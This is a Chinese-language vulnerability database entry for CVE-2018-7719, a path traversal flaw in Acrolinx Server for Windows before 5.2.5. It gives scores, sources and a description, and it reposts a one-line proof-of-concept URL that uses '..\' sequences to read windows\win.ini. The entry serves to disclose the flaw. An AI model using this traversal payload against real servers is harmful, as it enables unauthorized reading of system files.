Acrolinx Server for Windows 路径遍历漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1124911 漏洞类型 路径遍历
发布时间 2018-03-26 更新时间 2020-07-24
CVE编号 CVE-2018-7719 CNNVD-ID CNNVD-201803-848
漏洞平台 Windows CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/44345
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201803-848
|漏洞详情
Acrolinx Server for Windows是德国Acrolinx公司的一款基于Windows平台的智能语言分析服务器。 基于Windows平台的Acrolinx Server 5.2.5之前版本中存在路径遍历漏洞,该漏洞源于程序没有正确验证用户输入。攻击者可借助特制URL利用该漏洞查看系统上任意文件。
|漏洞EXP
# Exploit Title: Acrolinx Dashboard Directory Traversal
# CVE: CVE 2018-7719
# Date: 19.02.2017
# Exploit Author: Berk Dusunur
# Vendor Homepage: www.acrolinx.com
# Version:Before 5.2.5

PoC

Acrolinx dashboard windows works on the server.


http://localhost/..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini

http://www.berkdusunur.net/2018/03/tr-en-acrolinx-dashboard-directory.html
|参考资料

来源:CONFIRM
链接:https://support.acrolinx.com/hc/en-us/articles/213987685-Acrolinx-Server-Version-5-1-including-subsequent-service-releases-